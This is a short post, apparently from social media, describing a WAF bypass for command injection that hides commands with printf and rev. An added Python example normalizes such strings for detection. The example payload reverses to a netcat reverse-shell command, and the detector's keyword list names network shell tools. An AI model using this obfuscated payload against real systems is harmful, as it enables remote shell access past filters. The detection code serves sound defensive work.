A command injection WAF bypass method discovered by Picus Labs researcher @evrnyalcin.

It uses the "rev" and "printf" commands in command substitution.
Example: $(printf 'hsab/nib/ e- 4321 1.0.0.721 cn'|rev)

Read the write-up for details and mitigations: https://t.co/5A5Ntf3hvS
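
An added detection example (not from the write-up or Picus Labs): a Python normalization pass that expands printf|rev substitutions in a request value, so a signature sees the string the shell would actually run. The function names and the keyword list are assumptions for illustration; printf escapes and format specifiers are not interpreted.

```python
import re

# $(printf '<literal>' | rev) or the backtick form; the literal may use ' or ".
SUBST = re.compile(
    r"""(?:\$\(|`)\s*printf\s+(['"])(?P<lit>.*?)\1\s*\|\s*rev\s*(?:\)|`)""",
    re.DOTALL,
)

# Assumed, illustrative keyword signature of the kind a WAF rule might use.
SIGNATURE = re.compile(r"\b(?:nc|ncat|bash|sh|curl|wget)\b|/bin/")


def deobfuscate(value: str) -> str:
    """Replace each printf|rev substitution with the reversed literal."""
    return SUBST.sub(lambda m: m.group("lit")[::-1], value)


def inspect(value: str) -> dict:
    """Compare signature results on the raw and the normalized value."""
    normalized = deobfuscate(value)
    return {
        "obfuscated": bool(SUBST.search(value)),
        "normalized": normalized,
        "raw_hit": bool(SIGNATURE.search(value)),
        "normalized_hit": bool(SIGNATURE.search(normalized)),
    }


# The example string from the post, plus a constructed benign value.
POST_EXAMPLE = "$(printf 'hsab/nib/ e- 4321 1.0.0.721 cn'|rev)"
BENIGN = "name=alice&page=2"

if __name__ == "__main__":
    for sample in (POST_EXAMPLE, BENIGN):
        print(sample, "->", inspect(sample))
```

The signature misses the raw value and fires only after normalization, which is why the presence of a printf|rev substitution in user input is worth flagging on its own.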